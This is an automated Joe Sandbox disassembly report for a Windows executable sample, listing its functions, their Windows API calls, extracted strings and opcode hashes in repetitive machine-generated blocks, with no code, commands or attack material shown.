Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: c4cb9cb75098e70b6808507bddcc71991a7b73d90ea42dd74734b68370c798f3
Instruction ID: 81cece396e7cd67cba47b28581ac43bd26647c1addd223b224e4649f87a013e0
Opcode Fuzzy Hash: c4cb9cb75098e70b6808507bddcc71991a7b73d90ea42dd74734b68370c798f3
Instruction Fuzzy Hash: F3A011EA2AC20ABC300822082C0BEBA022CF8C0B30330880AB20BC0080AE800C8A0032

Function 0081DC44 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0081DC36

Part of subcall function 0081DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0081DFD6
Part of subcall function 0081DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0081DFE7

Memory Dump Source

Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: a88b2df5f833859019ac45a3dd9cd25266bb86985f85c550b178bd466297e692
Instruction ID: 57f41c657e1864891426987e2927ac24cdb6d719cc6b288233853370d5b2feaa
Opcode Fuzzy Hash: a88b2df5f833859019ac45a3dd9cd25266bb86985f85c550b178bd466297e692
Instruction Fuzzy Hash: A9A012D616C302BC700C21042C02FB6021CE8C0B103304C09B10BD014059842C854471

Function 0081DC4E Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0081DC36

Part of subcall function 0081DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0081DFD6
Part of subcall function 0081DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0081DFE7

Memory Dump Source

Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: c3a1ee0fa3f50f925c29e869d4a56d59bbae8abc9c55ff48274cc23ce1ddf8c5
Instruction ID: 57f41c657e1864891426987e2927ac24cdb6d719cc6b288233853370d5b2feaa
Opcode Fuzzy Hash: c3a1ee0fa3f50f925c29e869d4a56d59bbae8abc9c55ff48274cc23ce1ddf8c5
Instruction Fuzzy Hash: A9A012D616C302BC700C21042C02FB6021CE8C0B103304C09B10BD014059842C854471

Function 00809EBF Relevance: 1.5, APIs: 1, Instructions: 7fileCOMMON

Download Yara Rule

APIs

SetEndOfFile.KERNELBASE(?,00809104,?,?,-00001964), ref: 00809EC2

Memory Dump Source

Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd

Similarity

API ID: File
String ID:
API String ID: 749574446-0
Opcode ID: 2eb6dfb2f235b161e11609f6572db7bcceca6b1ce300fdca1ee1a3e47d4b43d9
Instruction ID: 8cb697f7e5434d69b096592c94367a0ee964a06597d4a86d874991028e098f8d
Opcode Fuzzy Hash: 2eb6dfb2f235b161e11609f6572db7bcceca6b1ce300fdca1ee1a3e47d4b43d9
Instruction Fuzzy Hash: 99B011300A880A8B8E002B30CE288283A20FAA230A3008AA0A002CA0A0CB22C002AA00

Function 0081A322 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetCurrentDirectoryW.KERNELBASE(?,0081A587,C:\Users\user\Desktop,00000000,0084946A,00000006), ref: 0081A326

Memory Dump Source

Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd

Similarity

API ID: CurrentDirectory
String ID:
API String ID: 1611563598-0
Opcode ID: 03f6d92d9320daa0db9255ed4ddbf1e05c573880988983a36da74f57bca4e000
Instruction ID: e771cdcf5cc482c18546f4e94e7b00ba62b71e732c28d8e541797c79b3478e8b
Opcode Fuzzy Hash: 03f6d92d9320daa0db9255ed4ddbf1e05c573880988983a36da74f57bca4e000
Instruction Fuzzy Hash: 2AA011302A800AAA8E000B30CC0AC2ABAA0ABA0B03F008A20B002C00A0CB30C828AA00

Function 008096D0 Relevance: 1.3, APIs: 1, Instructions: 30COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(000000FF,?,?,0080968F,?,?,?,?,00831FA1,000000FF), ref: 008096EB

Memory Dump Source

Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: afb964c4ce8ca0e600f7a66fbced791d2867ba01d37450e31d36e8f93682c731
Instruction ID: 6c7e0809de8d8a2ba012e1ae1c35fdc616627834edad42eb226a353dcf75bf8b
Opcode Fuzzy Hash: afb964c4ce8ca0e600f7a66fbced791d2867ba01d37450e31d36e8f93682c731
Instruction Fuzzy Hash: F1F0BE31446B048FDB308E24C9A8792B7E4FB22325F048B1EC1FB834E1A762684D8F00

Non-executed Functions

Function 0081B8E0 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 286timewindowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 0080130B: GetDlgItem.USER32(00000000,00003021), ref: 0080134F
Part of subcall function 0080130B: SetWindowTextW.USER32(00000000,008335B4), ref: 00801365

SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 0081B971
EndDialog.USER32(?,00000006), ref: 0081B984
GetDlgItem.USER32(?,0000006C), ref: 0081B9A0
SetFocus.USER32(00000000), ref: 0081B9A7
SetDlgItemTextW.USER32(?,00000065,?), ref: 0081B9E1
SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 0081BA18
FindFirstFileW.KERNEL32(?,?), ref: 0081BA2E
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0081BA4C
FileTimeToSystemTime.KERNEL32(?,?), ref: 0081BA5C
GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 0081BA78
GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0081BA94
_swprintf.LIBCMT ref: 0081BAC4

Part of subcall function 0080400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 0080401D

SetDlgItemTextW.USER32(?,0000006A,?), ref: 0081BAD7
FindClose.KERNEL32(00000000), ref: 0081BADE
_swprintf.LIBCMT ref: 0081BB37
SetDlgItemTextW.USER32(?,00000068,?), ref: 0081BB4A
SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 0081BB67
FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 0081BB87
FileTimeToSystemTime.KERNEL32(?,?), ref: 0081BB97
GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 0081BBB1
GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0081BBC9
_swprintf.LIBCMT ref: 0081BBF5
SetDlgItemTextW.USER32(?,0000006B,?), ref: 0081BC08
_swprintf.LIBCMT ref: 0081BC5C
SetDlgItemTextW.USER32(?,00000069,?), ref: 0081BC6F

Part of subcall function 0081A63C: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 0081A662
Part of subcall function 0081A63C: GetNumberFormatW.KERNEL32(00000400,00000000,?,0083E600,?,?), ref: 0081A6B1

Strings

%s %s, xrefs: 0081BB29, 0081BC4E
REPLACEFILEDLG, xrefs: 0081B907
%s %s %s, xrefs: 0081BAB2, 0081BBE7

Memory Dump Source

Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd

Similarity

API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLocalSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
String ID: %s %s$%s %s %s$REPLACEFILEDLG
API String ID: 797121971-1840816070
Opcode ID: c24ef00b9a6edc5168b39a59eb6b01ed361145e09a3c98592d8d7448d2fd651c
Instruction ID: 17921e77bb875a2889c7157b32660a54d6c47cf408d35a480c535940a13bd12e
Opcode Fuzzy Hash: c24ef00b9a6edc5168b39a59eb6b01ed361145e09a3c98592d8d7448d2fd651c
Instruction Fuzzy Hash: AE91A4B2248348BBD621DBA4DC49FFB77ACFF89704F040819F749D2091DB75A6458762

Function 0080718C Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 296fileCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00807191
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,00000001), ref: 008072F1
CloseHandle.KERNEL32(00000000), ref: 00807301

Part of subcall function 00807BF5: GetCurrentProcess.KERNEL32(00000020,?), ref: 00807C04
Part of subcall function 00807BF5: GetLastError.KERNEL32 ref: 00807C4A
Part of subcall function 00807BF5: CloseHandle.KERNEL32(?), ref: 00807C59

CreateDirectoryW.KERNEL32(?,00000000,?,00000001), ref: 0080730C
CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 0080741A
DeviceIoControl.KERNEL32(00000000,000900A4,?,-00000008,00000000,00000000,?,00000000), ref: 00807446
CloseHandle.KERNEL32(?), ref: 00807457
GetLastError.KERNEL32 ref: 00807467
RemoveDirectoryW.KERNEL32(?), ref: 008074B3
DeleteFileW.KERNEL32(?), ref: 008074DB

Strings

\??\, xrefs: 00807217
SeRestorePrivilege, xrefs: 008071B2
SeCreateSymbolicLinkPrivilege, xrefs: 008071BC
UNC\, xrefs: 0080723C

Memory Dump Source

Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd

Similarity

API ID: CloseCreateFileHandle$DirectoryErrorLast$ControlCurrentDeleteDeviceH_prologProcessRemove
String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
API String ID: 3935142422-3508440684
Opcode ID: 0ac464b59afaadf1ade63080fec63ef271104e824220cd26447dd5a6d5fa32cf
Instruction ID: 2eb63c3f2953240c70a80e7646b4f6ad6cc69c588209acb5ae17fd5e48071613
Opcode Fuzzy Hash: 0ac464b59afaadf1ade63080fec63ef271104e824220cd26447dd5a6d5fa32cf
Instruction Fuzzy Hash: CBB1D271D04615AADF21DFA4DC45BEE77B8FF44300F004469FA49E7282D734AA89CBA1

Function 00803281 Relevance: 12.9, APIs: 4, Strings: 3, Instructions: 608COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0080328A
_memcmp.LIBVCRUNTIME ref: 00803377

Strings

h%u, xrefs: 0080362D
CMT, xrefs: 00803990
hc%u, xrefs: 0080367B

Memory Dump Source

Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd

Similarity

API ID: H_prolog_memcmp
String ID: CMT$h%u$hc%u
API String ID: 3004599000-3282847064
Opcode ID: 91f80f972d0113b7519209d5c524f050585e462f5596e8d962315417a9695fcf
Instruction ID: 4ed95a7648bdc3e2ccda50176e8d34e4dab2ded572283c9decb9903789912a61
Opcode Fuzzy Hash: 91f80f972d0113b7519209d5c524f050585e462f5596e8d962315417a9695fcf
Instruction Fuzzy Hash: 1A327C716106849BDF54DF28CC95AEA37A9FF55300F04457EFD8ACB2C2DA70AA48CB61

Function 0082D00E Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMONLIBRARYCODE

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 0082D154

Strings

1#SNAN, xrefs: 0082E353
1#IND, xrefs: 0082E34C
1#INF, xrefs: 0082E361
1#QNAN, xrefs: 0082E35A

Memory Dump Source

Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: 40ee13789b050ce96c4340b429363db6ccbf38d49c318d3d507f4ddad38abe70
Instruction ID: c1a5511ce5f13793c97c8a1fd36396d599efc3c59c6239c70c4d5a6e5d70cd34
Opcode Fuzzy Hash: 40ee13789b050ce96c4340b429363db6ccbf38d49c318d3d507f4ddad38abe70
Instruction Fuzzy Hash: 2FC22872E086288FDB25CE28AD447E9B7B5FB84315F1541EAD84EE7240E774AEC18F44

Function 008027E8 Relevance: 7.8, APIs: 3, Strings: 1, Instructions: 794COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 008027F1
_strlen.LIBCMT ref: 00802D7F

Part of subcall function 0081137A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,0080B652,00000000,?,?,?,00010450), ref: 00811396

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00802EE0

Strings

CMT, xrefs: 00802F13

Memory Dump Source

Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd

Similarity

API ID: ByteCharH_prologMultiUnothrow_t@std@@@Wide__ehfuncinfo$??2@_strlen
String ID: CMT
API String ID: 1706572503-2756464174
Opcode ID: eba84faed7f5aa0ac62309da45d81de8594601a274b43cfada81f23952358f7d
Instruction ID: a685424dc99f7cc1c1ab64fe125b9650a2fdea144b8b51fbf1a8e9d21b8ce886
Opcode Fuzzy Hash: eba84faed7f5aa0ac62309da45d81de8594601a274b43cfada81f23952358f7d
Instruction Fuzzy Hash: D962CF716002448FDB68DF28CC9A6EA3BE5FF54304F09457DEC9ACB2C2DAB4A945CB51

Function 0082866F Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 00828767
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 00828771
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 0082877E

Memory Dump Source

Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 39bbcf66b5cd62cc0f14d16e8daf3b3b478c359b57d0855844adcd8397afee68
Instruction ID: 0e439bcb721d5984cf223a60010364a758d99eac2f7b21a00bf9367577a80be3
Opcode Fuzzy Hash: 39bbcf66b5cd62cc0f14d16e8daf3b3b478c359b57d0855844adcd8397afee68
Instruction Fuzzy Hash: 4031C375901228ABCB21DF28D889BCCB7B8FF58310F5041EAE91CA6251EB309BC58F45

Function 0082AAA8 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114COMMON

Download Yara Rule

Strings

., xrefs: 0082AC3B

Memory Dump Source

Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd

Similarity

API ID:
String ID: .
API String ID: 0-248832578
Opcode ID: a2bb4667bde8ebd1ed80ff5cd977228056a6774729938dc4796e42474820ac81
Instruction ID: 49f77e81ddefae31894470436f50cb2448f186df0fc5512768a4b1d9076b6e1c
Opcode Fuzzy Hash: a2bb4667bde8ebd1ed80ff5cd977228056a6774729938dc4796e42474820ac81
Instruction Fuzzy Hash: A5310671800229AFCB289E78EC84EEB7BBDFF85314F1405A8F519D7251E6309D84CB51

Function 0082CB60 Relevance: 3.5, APIs: 2, Instructions: 464COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3f40ebe10d214b85774591126f504afcb75e73f030a81f23e755a653bb72e8d1
Instruction ID: 02ad5707f2ce6bcdc9115e028b65bc8b81303fbaa2a1d5773748b9696519dbd9
Opcode Fuzzy Hash: 3f40ebe10d214b85774591126f504afcb75e73f030a81f23e755a653bb72e8d1
Instruction Fuzzy Hash: BB021D71E002299BDF14CFA9D9806ADBBF1FF88314F25426AD919E7384D731AA41CB90

Function 0081A63C Relevance: 3.0, APIs: 2, Instructions: 46COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 0081A662
GetNumberFormatW.KERNEL32(00000400,00000000,?,0083E600,?,?), ref: 0081A6B1

Memory Dump Source

Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd

Similarity

API ID: FormatInfoLocaleNumber
String ID:
API String ID: 2169056816-0
Opcode ID: ff2feaee3eeb80ee76caecf4747cbfc1ea25be126689a229258a143f06db62ef
Instruction ID: 1ac6a8ff3cbf499562dacddfa51e124ee8cd288714aa1086df3336a95d9ca441
Opcode Fuzzy Hash: ff2feaee3eeb80ee76caecf4747cbfc1ea25be126689a229258a143f06db62ef
Instruction Fuzzy Hash: 0A015E36510308BAD720DFA5EC05F9B77BCFF59711F004822BA04D7190E3749A24C7A5

Function 00806EC9 Relevance: 3.0, APIs: 2, Instructions: 17windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(0081117C,?,00000200), ref: 00806EC9
FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,?,?,00000000), ref: 00806EEA

Memory Dump Source

Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: 83f6a03fb39137c97b367e3b8df3d7c65675fe3d55a5b73b661072936a1d1a93
Instruction ID: 2025a88d206f4d898855f13018b49f3607137fe34bd7712a42810f66a926e2b9
Opcode Fuzzy Hash: 83f6a03fb39137c97b367e3b8df3d7c65675fe3d55a5b73b661072936a1d1a93
Instruction Fuzzy Hash: 1CD0C9353C8306BFEA610B74CC06F2B7BA4B795B86F208924B356E90E0DA7090349629

Function 00831194 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,0083118F,?,?,00000008,?,?,00830E2F,00000000), ref: 008313C1

Memory Dump Source

Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
